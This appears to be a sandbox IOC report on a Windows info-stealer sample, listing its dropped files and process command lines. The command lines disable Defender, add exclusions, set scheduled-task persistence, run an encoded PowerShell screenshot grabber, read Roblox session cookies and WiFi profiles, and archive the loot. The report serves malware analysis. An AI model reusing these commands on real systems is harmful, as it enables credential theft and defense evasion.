IOC Report
sB2ClgrGng.exe

loading gif

Files

File Path
Type
Category
Malicious
sB2ClgrGng.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Temp\mVQsx.zip
RAR archive data, v5
dropped
malicious
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\word.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x86cff748, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\word.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\ \Display (1).png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\RESADCB.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Oct 13 18:30:42 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank
data
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11gu0fnd.k2r.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2blbqggg.02m.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jeh404a.0hl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axsy1ahk.owl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbi2qw1r.vfm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2ubpqua.itu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehf5uq5h.gr5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoozeasq.xol.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5hwmpb4.zbb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3rv2o4m.223.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hotdhjw5.hs2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiksovxh.hiu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqoq1r12.2tn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l45qwzss.uhg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzkj5uxg.1m5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5ou2qhr.jjb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oguaqej5.dox.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqob2ocd.xwu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkijazon.g12.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4zctjnl.ge4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scbvfnjn.2lg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scpdvtzq.4qa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seg5ls1j.bu0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spliepfc.b4f.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsllid50.opd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umqrwf1h.imm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrttqmvp.pps.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4lb1nv1.fcr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.out
Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:01:16 2024, mtime=Sun Oct 13 16:01:16 2024, atime=Sun Oct 13 16:01:16 2024, length=68096, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 61 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\sB2ClgrGng.exe
"C:\Users\user\Desktop\sB2ClgrGng.exe"
malicious
C:\Users\user\Desktop\sB2ClgrGng.exe
"C:\Users\user\Desktop\sB2ClgrGng.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
malicious
C:\Users\user\AppData\Local\Temp\bound.exe
bound.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
malicious
C:\Windows\System32\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\systeminfo.exe
systeminfo
malicious
C:\Users\user\AppData\Roaming\word.exe
C:\Users\user\AppData\Roaming\word.exe
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
malicious
C:\Windows\System32\getmac.exe
getmac
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Users\user\AppData\Roaming\word.exe
"C:\Users\user\AppData\Roaming\word.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"
malicious
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
malicious
C:\Users\user\AppData\Roaming\word.exe
"C:\Users\user\AppData\Roaming\word.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic os get Caption
malicious
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
malicious
